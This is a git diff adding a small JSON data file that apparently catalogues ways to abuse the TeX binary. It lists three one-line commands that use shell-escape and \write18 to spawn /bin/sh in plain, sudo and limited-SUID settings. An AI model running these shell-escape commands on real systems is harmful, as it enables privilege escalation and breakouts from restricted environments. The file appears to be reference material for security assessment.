diff --git a/data/tex.json b/data/tex.json new file mode 100644 index 0000000..c437a01 --- /dev/null +++ b/data/tex.json @@ -0,0 +1,19 @@ +{ + "functions": { + "shell": [ + { + "code": "tex --shell-escape '\\write18{/bin/sh}\\end'\n" + } + ], + "sudo": [ + { + "code": "sudo tex --shell-escape '\\write18{/bin/sh}\\end'\n" + } + ], + "limited-suid": [ + { + "code": "./tex --shell-escape '\\write18{/bin/sh}\\end'\n" + } + ] + } +}